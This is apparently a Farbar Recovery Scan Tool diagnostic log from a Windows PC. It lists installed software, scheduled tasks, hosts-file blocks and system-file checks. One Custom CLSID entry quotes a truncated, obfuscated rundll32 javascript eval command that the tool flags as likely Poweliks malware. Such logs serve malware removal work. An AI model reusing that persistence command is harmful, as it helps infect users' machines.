2014-12-28 05:11 - 2012-06-30 15:31 - 00004142 _____ () C:\Windows\System32\Tasks\avast! Emergency Update
2014-12-27 16:00 - 2013-05-22 08:04 - 00003440 ____N () C:\Windows\System32\Tasks\PCDEventLauncherTask
2014-12-26 20:36 - 2012-07-06 20:17 - 00000000 ____D () C:\Users\anonymous\AppData\Roaming\vlc
2014-12-26 18:39 - 2012-07-01 13:53 - 00000000 ____D () C:\Users\anonymous\AppData\Local\Microsoft Games
2014-12-26 18:37 - 2012-07-03 18:59 - 00000000 ___RD () C:\Users\anonymous\Desktop\legal
2014-12-25 14:24 - 2014-09-20 13:29 - 00000000 ____D () C:\Users\anonymous\Desktop\NEW  SCANNING
2014-12-17 18:57 - 2014-05-25 14:16 - 00000000 ____D () C:\ProgramData\WinCalendarV4
2014-12-16 18:09 - 2012-07-06 19:33 - 00000000 ___RD () C:\Users\anonymous\Desktop\P ROGRAM S
2014-12-16 18:08 - 2013-07-24 16:42 - 00000000 ____D () C:\Program Files\CCleaner
2014-12-11 18:10 - 2012-09-08 14:01 - 00000000 ____D () C:\photos for iPhone
2014-12-11 04:18 - 2014-01-15 04:15 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk
2014-12-11 03:46 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-12-11 03:20 - 2014-04-30 02:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-12-11 03:20 - 2012-06-30 17:57 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-12-11 03:20 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-12-11 03:20 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\AppCompat
2014-12-11 03:04 - 2013-07-27 02:02 - 00000000 ____D () C:\Windows\system32\MRT
2014-12-11 03:02 - 2012-07-05 15:54 - 112710672 ____N (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-12-10 08:08 - 2012-07-07 13:46 - 00701104 ____N (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-12-10 08:08 - 2012-07-07 13:46 - 00071344 ____N (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-12-10 08:08 - 2012-07-07 13:46 - 00003768 ____N () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-12-06 17:22 - 2013-05-25 18:51 - 00000000 ____D () C:\Users\anonymous\Desktop\PROJECTS
2014-12-06 17:13 - 2012-09-26 15:06 - 00000000 ___RD () C:\Archive
2014-12-06 16:59 - 2012-12-30 13:25 - 00000000 ____D () C:\photos - digital 6
2014-12-06 15:11 - 2014-08-18 03:28 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-12-06 14:30 - 2012-06-30 14:59 - 00000000 ____D () C:\Security
2014-12-06 14:18 - 2012-07-09 17:25 - 00000000 ____D () C:\Users\anonymous\AppData\Local\Mozilla
2014-12-03 18:54 - 2012-09-12 16:45 - 00000000 ____D () C:\Users\anonymous\AppData\Roaming\DVDVideoSoft

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-12-25 00:11

==================== End Of Log ============================

 

 

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 27-12-2014
Ran by anonymous at 2015-01-02 15:45:26
Running from C:\Users\anonymous\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
Accidental Damage Services Agreement (HKLM-x32\...\{EF85FEF4-EB92-4075-A6D2-5F519BB30A2C}) (Version: 2.0.0 - Dell Inc.)
Acronis True Image Home (HKLM-x32\...\{67ED38A3-4882-448B-B44D-3428AB00D7D5}) (Version: 13.0.7154 - Acronis)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 14.0.0.110 - Adobe Systems Incorporated)
Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.5.23 - Adobe Systems Incorporated.)
Adobe Download Assistant (HKLM-x32\...\com.adobe.downloadassistant.AdobeDownloadAssistant) (Version: 1.2 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.246 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.246 - Adobe Systems Incorporated)
Adobe Photoshop Elements 10 (HKLM-x32\...\Adobe Photoshop Elements 10) (Version: 10.0 - Adobe Systems Incorporated)
Adobe Photoshop.com Inspiration Browser (HKLM-x32\...\PhotoshopdotcomInspirationBrowser.4C35C4D325D350FE0114230CBADCA2DDD0AC8D25.1) (Version: 3.07 - Adobe Systems Incorporated)
Adobe Reader X (10.1.13) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.13 - Adobe Systems Incorporated)
Ahnenblatt 2.70 (HKLM-x32\...\Ahnenblatt_is1) (Version: 2.70.0.0 - Dirk Boettcher)
AMD Catalyst Install Manager (HKLM\...\{48B16A40-2B59-875B-5DE6-6A6AB2BE766D}) (Version: 3.0.859.0 - Advanced Micro Devices, Inc.)
ANT Drivers Installer x64 (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
AOL Uninstaller (Choose which Products to Remove) (HKLM-x32\...\AOL Uninstaller) (Version:  - AOL Inc.)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft PhotoStudio 6 (HKLM-x32\...\{ED8EF3C2-FA5B-4A1E-950D-5A0227161F97}) (Version: 6.0.1.148 - ArcSoft)
Atheros Bluetooth Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.115 - Atheros)
Avast Free Antivirus (HKLM-x32\...\avast) (Version: 10.0.2208 - AVAST Software)
Bing Bar (HKLM-x32\...\{C28D96C0-6A90-459E-A077-A6706F4EC0FC}) (Version: 7.0.765.0 - Microsoft Corporation)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
BufferChm (x32 Version: 130.0.331.000 - Hewlett-Packard) Hidden
C4600 (x32 Version: 130.0.425.000 - Hewlett-Packard) Hidden
Canon CanoScan 9000F User Registration (HKLM-x32\...\Canon CanoScan 9000F User Registration) (Version:  - )
Canon MP Navigator EX 3.1 (HKLM-x32\...\MP Navigator EX 3.1) (Version:  - )
Canon Utilities Solution Menu (HKLM-x32\...\CanonSolutionMenu) (Version:  - )
CanoScan 9000F Scanner Driver (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_CNQ9602) (Version:  - )
CCleaner (HKLM\...\CCleaner) (Version: 5.00 - Piriform)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.1.0.0 - Citrix Systems, Inc.)
Consumer In-Home Service Agreement (HKLM-x32\...\{F47C37A4-7189-430A-B81D-739FF8A7A554}) (Version: 2.0.0 - Dell Inc.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dell DataSafe Local Backup - Support Software (HKLM-x32\...\{A9668246-FB70-4103-A1E3-66C9BC2EFB49}) (Version: 9.4.67 - Dell Inc.)
Dell DataSafe Local Backup (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 9.4.67 - Dell Inc.)
Dell DataSafe Online (HKLM-x32\...\{7EC66A95-AC2D-4127-940B-0445A526AB2F}) (Version: 2.1.19634 - Dell)
Dell Digital Delivery (HKLM-x32\...\{AFC08A81-D3C5-46F4-8F08-876E4BA606EA}) (Version: 1.7.4502.0 - Dell Products, LP)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 9.0 - Dell Inc.)
Destinations (x32 Version: 130.0.0.0 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 130.0.372.000 - Hewlett-Packard) Hidden
eBay (HKLM-x32\...\{A8B88634-7F90-402F-B66A-86429755F6A5}) (Version: 1.4.0 - eBay Inc.)
Elements 10 Organizer (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden
Elevated Installer (x32 Version: 3.2.17.0 - Garmin Ltd or its subsidiaries) Hidden
Eraser 6.0.10.2620 (HKLM\...\{6E5159B4-A519-41EF-80EF-AD58371515DF}) (Version: 6.0.2620 - The Eraser Project)
Exif Tag Remover 4.3 (HKLM-x32\...\Exif Tag Remover_is1) (Version:  - RL Vision)
Flash Cookie Cleaner (HKLM-x32\...\{E4E1D7C7-6561-4462-96B5-E6439488ED41}) (Version: 2.0 - ConsumerSoft)
Garmin Communicator Plugin x64 (HKLM\...\{550331CC-C34B-494F-BCDA-37CE4EF6E924}) (Version: 4.0.3 - Garmin Ltd or its subsidiaries)
Garmin Express (HKLM-x32\...\{b43ffffb-1adc-4bcb-b277-7844ebff94da}) (Version: 3.2.17.0 - Garmin Ltd or its subsidiaries)
Garmin Express (x32 Version: 3.2.17.0 - Garmin Ltd or its subsidiaries) Hidden
Garmin Express Tray (x32 Version: 3.2.17.0 - Garmin Ltd or its subsidiaries) Hidden
Genie Backup Manager (HKLM\...\Genie Backup Manager) (Version: 9.0 - Genie9)
GIMP 2.8.6 (HKLM\...\GIMP-2_is1) (Version: 2.8.6 - The GIMP Team)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 10.2.0.822 - Citrix Online, a division of Citrix Systems, Inc.)
GPBaseService2 (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
HP Customer Participation Program 13.0 (HKLM\...\HPExtendedCapabilities) (Version: 13.0 - HP)
HP Imaging Device Functions 13.0 (HKLM\...\HP Imaging Device Functions) (Version: 13.0 - HP)
HP Photosmart C4600 All-In-One Driver Software 13.0 Rel .5 (HKLM\...\{44C81D1A-0520-49BB-B510-98B8DD414EA1}) (Version: 13.0 - HP)
HP Print Projects 1.0 (HKLM\...\HP Print Projects) (Version: 1.0 - HP)
HP Smart Web Printing 4.5 (HKLM\...\HP Smart Web Printing) (Version: 4.5 - HP)
HP Solution Center 13.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 13.0 - HP)
HP Update (HKLM-x32\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)
HPPhotoGadget (x32 Version: 130.0.282.000 - Hewlett-Packard) Hidden
hpPrintProjects (x32 Version: 130.0.303.000 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
HPSSupply (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
hpWLPGInstaller (x32 Version: 130.0.303.000 - Hewlett-Packard) Hidden
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel® Manageability Engine Firmware Recovery Agent (HKLM-x32\...\{A6C48A9F-694A-4234-B3AA-62590B668927}) (Version: 1.0.0.35342 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.1.1399 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.0.0.1032 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.3.214 - Intel Corporation)
Intel® Trusted Connect Service Client (HKLM\...\{538B98C3-773F-4F20-9C66-802D104DCBE2}) (Version: 1.23.219.2 - Intel Corporation)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: 4.37 - Irfan Skiljan)
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
MarketResearch (x32 Version: 130.0.374.000 - Hewlett-Packard) Hidden
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{820B6609-4C97-3A2B-B644-573B06A0F0CC}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Mozilla Firefox 31.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 31.0 (x86 en-US)) (Version: 31.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 31.2.0 - Mozilla)
Mozilla Thunderbird 31.2.0 (x86 en-US) (HKLM-x32\...\Mozilla Thunderbird 31.2.0 (x86 en-US)) (Version: 31.2.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Multimedia Card Reader (HKLM-x32\...\InstallShield_{41068A8C-3F30-46B6-978A-EA692F28D1AF}) (Version: 1.7.915.93 - Fitipower)
Multimedia Card Reader (x32 Version: 1.7.915.93 - Fitipower) Hidden
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
Nero BurningROM 12 (HKLM-x32\...\{3D9167B2-87EB-4713-90B4-E46F2CAFE28D}) (Version: 12.0.00300 - Nero AG)
Nero Prerequisite Installer 2.0 (HKLM-x32\...\{0DBC021C-95D9-435A-A4B0-E6515AFD1A71}) (Version: 12.0.01000 - Nero AG)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.0 - Nikon)
Nikon Movie Editor (HKLM-x32\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.8.0 - Nikon)
Online Plug-in (x32 Version: 13.4.0.25 - Citrix Systems, Inc.) Hidden
Online Plug-in (x32 Version: 14.1.0.0 - Citrix Systems, Inc.) Hidden
Picture Control Utility x64 (HKLM\...\{11953C65-BB4E-4CA4-B0F0-2600A4B20040}) (Version: 1.4.14 - Nikon)
Prerequisite installer (x32 Version: 12.0.0003 - Nero AG) Hidden
PS_AIO_05_C4600_Software_Min (x32 Version: 130.0.425.000 - Hewlett-Packard) Hidden
PSE10 STI Installer (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden
Quicken WillMaker Plus 2013 (HKLM-x32\...\{8065044B-2AF3-434E-A6E2-B7C60CDB978B}) (Version: 1.0.0.0 - Nolo)
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6537 - Realtek Semiconductor Corp.)
Scan (x32 Version: 13.0.0.0 - Hewlett-Packard) Hidden
Self-service Plug-in (x32 Version: 4.1.0.41738 - Citrix Systems, Inc.) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 13.0 - HP)
Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.)
SmartWebPrinting (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
SolutionCenter (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A88D31DE6}_is1) (Version: 1.6.2 - Safer Networking Limited)
Status (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
Stream-Cloner V2.10 Build 301 (HKLM-x32\...\Stream-Cloner 2_is1) (Version: 2.10.0.301 - OpenCloner Inc.)
Toolbox (x32 Version: 130.0.648.000 - Hewlett-Packard) Hidden
TouchCopy 11 (HKLM-x32\...\{5AC396F4-3C70-452F-A7C8-54C84ECAED41}) (Version: 11.07 - Wide Angle Software)
TouchCopy 12 (HKLM-x32\...\{838F12C2-14CA-43A2-83C4-97681576C0D7}) (Version: 12.03 - Wide Angle Software)
TrayApp (x32 Version: 130.0.376.000 - Hewlett-Packard) Hidden
TrueCrypt (HKLM-x32\...\TrueCrypt) (Version: 7.1a - TrueCrypt Foundation)
ViewNX 2 (HKLM\...\{635BE602-BB9C-4C59-8CC5-93F9366E8A21}) (Version: 2.8.1 - Nikon)
VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
WebReg (x32 Version: 130.0.132.017 - Hewlett-Packard) Hidden
WinCalendar V4 (HKLM-x32\...\WinCalendar V4) (Version: 4.23 - Sapro Systems)
Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB  (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
WinZip (HKLM-x32\...\WinZip) (Version:  9.0  (6028) - WinZip Computing, Inc.)
Yahoo! Toolbar (HKLM-x32\...\Yahoo! Companion) (Version:  - )

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{4F8A6B95-6220-40e1-BAF6-4F2810B32428}\InprocServer32 -> C:\Audiovisual & Graphics\Thumbs Plus 8 SP1\Bin\cswshlex64.dll No File
CustomCLSID: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?

==================== Restore Points  =========================

04-11-2014 05:01:06 Windows Update
07-11-2014 05:09:00 Windows Update
11-11-2014 02:46:40 Windows Update
12-11-2014 03:00:17 Windows Update
18-11-2014 04:58:37 Windows Update
19-11-2014 03:00:11 Windows Update
25-11-2014 05:01:14 Windows Update
28-11-2014 19:09:43 avast! antivirus system restore point
02-12-2014 03:22:58 Windows Update
09-12-2014 05:40:04 Windows Update
10-12-2014 04:42:32 Spybot-S&D Spyware removal
11-12-2014 03:00:18 Windows Update
12-12-2014 03:00:10 Windows Update
16-12-2014 03:13:39 Windows Update
18-12-2014 03:00:10 Windows Update
23-12-2014 03:13:33 Windows Update
30-12-2014 00:45:12 Windows Update

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2014-12-10 04:43 - 00450776 ____R C:\Windows\system32\Drivers\etc\hosts
127.0.0.1    www.007guard.com
127.0.0.1    007guard.com
127.0.0.1    008i.com
127.0.0.1    www.008k.com
127.0.0.1    008k.com
127.0.0.1    www.00hq.com
127.0.0.1    00hq.com
127.0.0.1    010402.com
127.0.0.1    www.032439.com
127.0.0.1    032439.com
127.0.0.1    www.0scan.com
127.0.0.1    0scan.com
127.0.0.1    1000gratisproben.com
127.0.0.1    www.1000gratisproben.com
127.0.0.1    1001namen.com
127.0.0.1    www.1001namen.com
127.0.0.1    www.100888290cs.com
127.0.0.1    100888290cs.com
127.0.0.1    100sexlinks.com
127.0.0.1    www.100sexlinks.com
127.0.0.1    www.10sek.com
127.0.0.1    10sek.com
127.0.0.1    1-2005-search.com
127.0.0.1    www.1-2005-search.com
127.0.0.1    www.123fporn.info
127.0.0.1    123fporn.info
127.0.0.1    www.123haustiereundmehr.com
127.0.0.1    123haustiereundmehr.com
127.0.0.1    www.123moviedownload.com

There are 1000 more lines.


==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {08F6EEE1-A556-4B35-B125-1352D38F8FA3} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-12-14] (Google Inc.)
Task: {28AFF019-695A-4127-96F6-0D55C81C7BC6} - System32\Tasks\{58C545FD-8C76-4C72-BA22-508780BECD16} => C:\Security\cCleaner\CCleaner64.exe
Task: {2E8ECD91-E48E-4B60-AAE4-671E1D0E29F5} - System32\Tasks\{F3BD7F1F-51E1-4FAC-815F-E8A5B9DC6E78} => C:\Program Files (x86)\AOL Desktop 9.7a\aol.exe [2014-08-19] (AOL Inc.)
Task: {308D5A3C-8D68-4812-A261-5ABD047AE9E2} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-12-14] (Google Inc.)
Task: {35FB8035-C6BF-4739-90D7-CA1D34DF1160} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express Self Updater\ExpressSelfUpdater.exe [2014-08-07] ()
Task: {40F910A8-7B62-4770-BF57-E2CDEED49600} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {43C3BDE6-44D1-4CB7-BF8C-29BA2EC6516F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-11-21] (Piriform Ltd)
Task: {484F4F01-3A84-419F-9E0D-B05AF85DDA1C} - System32\Tasks\GBM - New Backup Job-Full => C:\Program Files\Genie9\Genie Backup Manager\GBM.EXE [2012-06-04] (Genie9)
Task: {4D8EDD6E-E2BD-49DB-9A38-418C68446C1A} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => c:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe [2011-11-25] (Intel Corporation)
Task: {507AECB2-D0F2-4D71-BD55-415773FB1B97} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {55E5EB09-AE70-498C-A24B-D26937F9D814} - System32\Tasks\avast! Emergency Update => C:\Security\Avast\AvastEmUpdate.exe [2014-11-28] (AVAST Software)
Task: {5C4E1165-A03D-4F43-AA8A-ABBAF628D776} - System32\Tasks\{35B60B70-4266-4184-BD6D-ED6C120FF22F} => C:\Program Files (x86)\AOL Desktop 9.7\aol.exe [2013-09-07] (AOL Inc.)
Task: {5D4D75AD-8BFA-40CC-AC17-873EEC33C093} - System32\Tasks\{BF979F2A-7CB1-4662-B2A0-C69F9D2F7550} => C:\Program Files (x86)\AOL Desktop 9.7a\aol.exe [2014-08-19] (AOL Inc.)
Task: {9500462C-E33E-4CBA-B436-F45304D8AED4} - System32\Tasks\{81263530-85AE-4864-B764-AA1E9FF3287F} => C:\Security\cCleaner\CCleaner64.exe
Task: {9576B138-BCC3-4782-8921-AB01DD89822A} - System32\Tasks\{0AC9BC12-31DC-477D-845E-F832A8791205} => C:\Program Files (x86)\AOL Desktop 9.7\aol.exe [2013-09-07] (AOL Inc.)
Task: {9C4D9481-CBF5-42CA-89B0-051F5768F3DF} - System32\Tasks\{097B2FE1-BE8F-433B-BE14-E0A3631F37B5} => C:\Security\cCleaner\CCleaner64.exe
Task: {A7FCA671-FB6B-45B6-A325-48CDFD18CC0C} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-12-10] (Adobe Systems Incorporated)
Task: {B4064A4C-0952-4117-852E-034637C834A8} - System32\Tasks\{8EAF3A06-9E86-4371-BB39-45AD86DD93E5} => K:\LaCie Setup.exe
Task: {BFDE29E6-7B48-4574-B703-0CBE3D8DD1F7} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\My Dell\uaclauncher.exe [2014-01-31] (PC-Doctor, Inc.)
